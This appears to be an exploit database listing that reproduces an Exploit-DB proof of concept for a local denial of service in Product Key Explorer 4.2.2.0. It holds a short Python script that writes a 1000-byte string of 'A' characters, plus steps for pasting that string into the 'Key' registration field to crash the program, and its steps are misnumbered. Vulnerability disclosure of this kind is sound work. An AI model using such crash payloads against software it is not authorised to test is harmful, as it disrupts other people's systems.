header-logo
Suggest Exploit
vendor:
Product Key Explorer
by:
0xMoHassan
6.5
CVSS
MEDIUM
Denial of Service (DoS) Local
CWE
Product Name: Product Key Explorer
Affected Version From: 4.2.2.0
Affected Version To: 4.2.2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP - SP3
2020

Product Key Explorer 4.2.2.0 – ‘Key’ Denial of Service (PoC)

The vulnerability allows a local attacker to cause a denial of service (DoS) condition on the affected system. By providing a specially crafted input in the 'Key' field, the application crashes, resulting in the unavailability of the service.

Mitigation:

To mitigate this vulnerability, users are advised to update to the latest version of Product Key Explorer. Additionally, it is recommended to avoid importing untrusted or malicious data into the 'Key' field.
Source

Exploit-DB raw data:

# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Tested Version: 4.2.2.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3

# About App

# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers.


# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Magic happen :)



#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500

try:
    f=open("POC.txt","w")
    print "[+] Creating %s bytes payload.." %len(buff)
    f.write(buff)
    f.close()
    print "[+] POC created!"
except:
    print "POC cannot be created"